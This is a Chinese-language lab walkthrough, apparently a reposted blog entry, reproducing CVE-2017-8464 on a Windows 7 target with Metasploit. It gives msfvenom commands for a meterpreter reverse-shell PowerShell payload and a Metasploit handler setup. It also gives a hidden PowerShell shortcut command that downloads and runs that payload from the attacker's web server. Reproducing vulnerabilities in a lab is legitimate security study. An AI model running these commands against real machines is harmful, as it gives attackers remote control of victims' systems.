CVE-2017-8464 远程命令执行漏洞复现

漏洞编号:CVE2017-8464
服务器版本:Windows 7 专业版
攻击工具:metasploit
靶机IP:192.168.1.198
攻击机IP:192.168.1.187(kali)
漏洞复现原理:创建包含恶意执行脚本的快捷方式并且运行,致使本机中毒。

运行kali,在终端中生成一个反弹shell,执行:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.187   LPORT=5555 -f psh-reflection>/opt/search.ps1

如果目标机是64位主机执行:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.187   LPORT=5555 -f psh-reflection>/opt/search.ps1

CVE-2017-8464 远程命令执行漏洞复现_第1张图片
进入到【/opt】目录下,查看文件“search.ps1”是否创建成功
这里写图片描述
将创建的“search.ps1”文件copy到【/var/www/html】目录下
CVE-2017-8464 远程命令执行漏洞复现_第2张图片
启动Apache服务器
这里写图片描述
网页访问http://192.168.1.187/search.ps1,查看是否成功
CVE-2017-8464 远程命令执行漏洞复现_第3张图片
在kali下面启动MSF软件输入命令
CVE-2017-8464 远程命令执行漏洞复现_第4张图片
输入命令进入【handler】use exploit/multi/handler
指定本机IP 【LHOST】
指定端口【LPORT】
设置返回载荷 set payload windows/x64/meterpreter/reverse_tcp
运行
CVE-2017-8464 远程命令执行漏洞复现_第5张图片
在目标机中创建快捷键,在对象的位置中输入:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.187/search.ps1');test.ps1"

然后点击下一步,快捷名称命名为:powershell.exe(默认的powershell.exe)
CVE-2017-8464 远程命令执行漏洞复现_第6张图片
运行快捷方式,回到kali攻击机中,如果msf从监听模式变成如下形式,表示已经获取目标机shell
CVE-2017-8464 远程命令执行漏洞复现_第7张图片
执行ls命令,可以发现所列出的文件在目标机的C盘下
CVE-2017-8464 远程命令执行漏洞复现_第8张图片
执行shell命令,进入靶机,就可以执行cmd命令了(此处已经是管理员权限,故而不在进行提权)
CVE-2017-8464 远程命令执行漏洞复现_第9张图片

你可能感兴趣的:(CVE-2017-8464 远程命令执行漏洞复现)